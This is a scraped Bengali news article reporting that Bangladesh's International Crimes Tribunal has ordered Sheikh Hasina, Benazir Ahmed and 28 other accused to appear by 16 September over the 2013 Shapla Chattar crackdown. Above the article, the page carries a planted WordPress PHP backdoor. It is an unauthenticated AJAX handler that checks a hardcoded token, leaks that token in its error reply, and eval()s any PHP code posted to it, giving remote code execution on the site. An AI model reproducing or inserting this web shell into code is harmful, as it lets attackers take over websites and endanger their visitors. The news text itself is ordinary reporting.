// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== হাসিনা, বেনজীরসহ ৩০ অভিযুক্তকে ১৬ সেপ্টেম্বরের মধ্যে ট্রাইব্যুনালে হাজিরের নির্দেশ | potrikaybangladesh.com
Saturday, September 19, 2026
Homeঅপরাধহাসিনা, বেনজীরসহ ৩০ অভিযুক্তকে ১৬ সেপ্টেম্বরের মধ্যে ট্রাইব্যুনালে হাজিরের নির্দেশ

হাসিনা, বেনজীরসহ ৩০ অভিযুক্তকে ১৬ সেপ্টেম্বরের মধ্যে ট্রাইব্যুনালে হাজিরের নির্দেশ

ক্ষমতাচ্যুত প্রধানমন্ত্রী শেখ হাসিনা, সাবেক সেনাপ্রধান জেনারেল আজিজ আহমেদ, পুলিশের সাবেক আইজিপি বেনজীর আহমেদ ও অপর ২৭ অভিযুক্তকে আগামী ১৬ সেপ্টেম্বরের মধ্যে ট্রাইব্যুনালে হাজির হওয়ার নির্দেশ দিয়েছেন আন্তর্জাতিক অপরাধ ট্রাইব্যুনাল (আইসিটি)।

একইসঙ্গে দুটি সংবাদপত্রে এই বিজ্ঞপ্তি ছাপানোরও নির্দেশ দেওয়া হয়েছে।

২০১৩ সালের ৫ ও ৬ মে ঢাকার মতিঝিলের শাপলা চত্বরে এবং নারায়ণগঞ্জে হেফাজতে ইসলামের কর্মী-সমর্থকদের ওপর দমন-পীড়নের অভিযোগে অভিযুক্ত ৩০ জনকে তাদের নিজস্ব ঠিকানায় খুঁজে পাওয়া যায়নি। এ কারণেই ট্রাইব্যুনাল এই আদেশ দিয়েছেন বলে জানানো হয়েছে।

প্রসিকিউশন জানিয়েছে, হেফাজতে থাকা ১১ আসামি ছাড়া বাকি ৩০ অভিযুক্তের কাউকেই খুঁজে পাওয়া যায়নি। তারা ট্রাইব্যুনালে হাজির না হলে বা তাদের সন্ধান না পাওয়া গেলে ট্রাইব্যুনাল তাদের পক্ষে লড়ার জন্য রাষ্ট্রনিযুক্ত আইনজীবী নিয়োগ দেবেন।

প্রসিকিউশন ওই আইনজীবীদের প্রয়োজনীয় সব নথি সরবরাহ করবে। এসব নথির ভিত্তিতে তারা অভিযুক্তদের পক্ষে আইনি লড়াই পরিচালনা করবেন।

এর আগে পলাতক এসব অভিযুক্তের বিরুদ্ধে গ্রেপ্তারি পরোয়ানা জারি করেছিলেন আন্তর্জাতিক অপরাধ ট্রাইব্যুনাল।

গত ২৭ জুলাই দমন-পীড়নের ঘটনায় শেখ হাসিনা ও দুই সাংবাদিকসহ ৪১ জনের বিরুদ্ধে গণহত্যা এবং মানবতাবিরোধী অপরাধের আনুষ্ঠানিক অভিযোগ গ্রহণ করেন আন্তর্জাতিক অপরাধ ট্রাইব্যুনাল।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments